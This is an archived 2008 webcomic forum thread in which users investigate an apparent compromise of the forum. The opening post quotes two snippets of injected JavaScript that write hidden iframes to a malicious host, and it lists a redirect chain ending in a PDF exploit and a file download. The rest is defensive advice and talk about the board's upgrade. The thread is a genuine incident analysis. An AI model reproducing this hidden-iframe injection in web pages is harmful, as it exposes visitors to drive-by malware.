Twokinds ARCHIVE Forums

This forum is for the preservation of old threads from before the forum pruning.
It is currently Tue Apr 15, 2025 5:24 pm

All times are UTC - 5 hours




Post new topic Reply to topic  [ 54 posts ]  Go to page 1, 2, 3, 4  Next
Author Message
 Post subject: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 12:13 pm 
Offline
Citizen
User avatar

Joined: Wed Jul 30, 2008 5:13 am
Posts: 96
Seems to be... Currently, there seems to be code on each of the pages. (To see it, view the page source that you're on (seemingly regardless of the style you're using), and look for the words plgbn15(p) and flbn15(p)). The first block of code, executed and evaluated, does this:
Code:
window.status='Done';document.write('<iframe name=b21a src="http://add-content-block.net/t/?'+Math.round(Math.random()*14850)+'b21a'+'" width=135 height=110 style="display:none"></iframe>')
while the second does this:
Code:
window.status='Done';document.write('<iframe name=7346 src="http://add-content-block.net/t/?'+Math.round(Math.random()*31108)+'7346'+'" width=404 height=77 style="display:none"></iframe>')


Both of these attacks are known as malicious iframe attacks (read more here, here and here. For more info on iframes, check wikipedia. In each case, the iframes trigger a series of redirections, and I managed to partially trace them through a bunch of websites. (Partial because my modem decided to crash midway.)

The websites are listed in the order that they were requested by the malicous iframe:
add-content-block.net/t/?13559b21a (The last part is always somewhat random and will vary.)
analystic.org/in.cgi?16&e1d9f8 (Ditto, as far as I can tell.)
analystic.org/potok.php
analystic.org/in.cgi?8
xdrv.info/uno/count.php?o=2
busyhere.ru/in.cgi?pipka2
xdrv.info/uno/count.php?o=7
xdrv.info/uno/exploits/x18.php?o=2&t=1223824153&i=3707701169 -- this opened a pdf
66.212.19.146/g/index.php -- autorun a file
66.212.19.146/g/pdf.php -- downloads a file
pornarrows.com/none

In each case, the loading is fairly undetectable - the most you'll see is "Loading analystic.org/potok.php...", and briefly at that. As far as I can tell, this takes advantage of a vulnerability in Adobe Acrobat to do something. I'm not sure what, running it in a sandbox caused Acrobat to crash badly.

At this point, I can't do anything, beyond trying to trace the entire route it takes, which I can't right now for various reasons. However, I believe that using Firefox with NoScript (not just Firefox alone) should prevent this attack from succeeding. One thing that you can check is C:\Documents and Settings\All Users\Start Menu\Programs\Startup and see if there's a file called browsers.exe? If there is, delete it. That's the only reference I came across that had a reference to a specific file.

I'll continue this tomorrow (in about 7 hours or so if you're counting), but in the meantime KitWiz and Robbiethe1st, among others, will probably have some insights into this whole thing. Also, sorry to Yash for starting on this topic in the Ranting Board and derailing one of the topics.

I am sincerely hoping that someone will find a way to prove me wrong, but to me it looks as if the 2kinds forum has been a victim of a malicious attack, whether automated or targeted at 2kinds.


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 12:29 pm 
Offline
Templar Inner Circle
User avatar

Joined: Wed Mar 09, 2005 1:55 am
Posts: 2885
Location: Somewhere in my pants.
Chrome gives it's anti-malware warning on the front page as well. =/


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 12:51 pm 
Offline
Templar
User avatar

Joined: Wed Aug 13, 2008 6:08 pm
Posts: 397
Location: Haha, I see you.....
It was the people from phoenix req with their vote bots and trying to kill our computers >.<


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 12:56 pm 
Offline
The Inkwell Coyote
User avatar

Joined: Wed Aug 09, 2006 4:28 pm
Posts: 7495
Location: 44°39'54"N 90°10'33"W
It may be because I'm slogging through the middle, worst part of a bad cold but I really don't understand anything that happened seven inches above this post...

Forum... broke?


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 1:06 pm 
Offline
Resident Rule Nazi
User avatar

Joined: Tue Feb 15, 2005 3:52 pm
Posts: 1122
I am personally bringing this matter up to Tom. This could possibly a serious security violation that affects almost every user on the Twokinds forum. Hopefully, he will have the time to respond.

*EDIT* PM sent. If he responds to me directly, (and allows me to post his message) I will post his response in this thread.


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 1:13 pm 
Offline
Templar
User avatar

Joined: Wed Aug 13, 2008 6:08 pm
Posts: 397
Location: Haha, I see you.....
Wonder if that's what is making my computer load slowly...


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 1:33 pm 
Offline
Templar Master
User avatar

Joined: Thu Jul 17, 2008 10:09 am
Posts: 443
Location: My own little fortress...
But allowing "2kinds.com" is still okay with NoScript? Just checking..

NoScript notifies about said "add-content-block.net", but ALSO about "bibilon.net" and "recentl.cn". Are they similiar to this or should they be there?

@Fast and others who didn't read/understand, Forum didn't break. It's users are under computer security threat. NoScript for Firefox ought to keep you safe.


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 3:43 pm 
Offline
Citizen

Joined: Tue Sep 16, 2008 10:27 pm
Posts: 99
Sorry, I've been a tad bit busy for the past few days but I'll check Tom's php coding directly....


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 3:46 pm 
Offline
Templar Inner Circle

Joined: Tue Jul 15, 2008 1:37 am
Posts: 3264
Location: Washington
Jeez, Kit, don't overload yourself...


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 5:13 pm 
Offline
Grand Templar
User avatar

Joined: Wed Aug 29, 2007 3:24 pm
Posts: 1545
Location: Carmina Gadelica
*Also apologizes for aiding and abetting the aforementioned thread derailment*
<<;

This NoScript for Firefox...it is an add-on, I take it? Would picking it up now be a case of too little, too late?
o.o


Top
 Profile  
 
 Post subject:
PostPosted: Sun Oct 12, 2008 5:14 pm 
Offline
Citizen
User avatar

Joined: Wed Jul 30, 2008 5:13 am
Posts: 96
Demus wrote:
But allowing "2kinds.com" is still okay with NoScript? Just checking..

NoScript notifies about said "add-content-block.net", but ALSO about "bibilon.net" and "recentl.cn". Are they similiar to this or should they be there?

@Fast and others who didn't read/understand, Forum didn't break. It's users are under computer security threat. NoScript for Firefox ought to keep you safe.

Hmm... interesting... My copy of NoScript is only warning about add-content-block.net. Shall keep an eye out for those sites later.

Anyway, yes, 2kinds.com is technically safe to allow - the iframe will load, but NoScript prevents it from doing anything, and the other features of the forum that use JavaScript will remain unaffected.

The strange thing about this is that immediately after the malicious script, this comment appears:
Code:
<!-- twokindscomic.com -->

I checked twokindscomic.com, and there's no immediately obvious link (as in hyperlink) to 2kinds.com, which makes me think that the server 2kinds.com is hosted on itself has been compromised. If 2kinds was targeted, I don't think someone would put in the wrong address.

Tuna wrote:
This NoScript for Firefox...it is an add-on, I take it? Would picking it up now be a case of too little, too late?
o.o


Not necessarily. In this specific case, yes, it would be too late, but I'd say get it anyway, because it would prevent attacks like this from happening to you in the future. If the forum's server is compromised, the forum itself could be reinfected once cleaned, or even if you go to another page that's infected, you would be silently attacked again. I think it's better to reduce the potential of attacks. =)

I'm going to continue working on this today at school (which I'm leaving for in about 10 minutes) and post anything new later. Have a good day/night to you all. (And get better soon Fast!)


Top
 Profile  
 
 Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 8:55 pm 
Offline
Templar Inner Circle
User avatar

Joined: Sun Mar 30, 2008 10:05 pm
Posts: 2906
Location: Five miles into nothing, sitting in a Dennies
Something happened....

The forum was down for awhile, now it's back.. er...

Is this phpbb 3?


Top
 Profile  
 
 Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 9:00 pm 
Offline
The Inkwell Coyote
User avatar

Joined: Wed Aug 09, 2006 4:28 pm
Posts: 7495
Location: 44°39'54"N 90°10'33"W
I'm not sure. The format is different, though I'm not sure if I like the new layout. Very grey, drab.

Edit: Ugh, my avatar just got crushed, too.


Top
 Profile  
 
 Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 9:05 pm 
Offline
Templar Inner Circle
User avatar

Joined: Sun Mar 30, 2008 10:05 pm
Posts: 2906
Location: Five miles into nothing, sitting in a Dennies
This reminds me of others I've seen, especially with the "User Control Panel" instead of the profile. Methinks it is 3.

And same with mine, though, to a less degree.


Top
 Profile  
 
 Post subject: Re: Has the forum been compromised?
PostPosted: Sun Oct 12, 2008 9:20 pm 
Offline
Citizen
User avatar

Joined: Tue Dec 25, 2007 11:05 pm
Posts: 75
Location: Ottawa, Canada
Should I or someone else start a new thread about the new board?

I'm now using the new default default "prosilver" theme. It's... very blue.
... but avatars on the right doesn't seem to fit TwoKinds Forum very well...


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 54 posts ]  Go to page 1, 2, 3, 4  Next

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 3 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group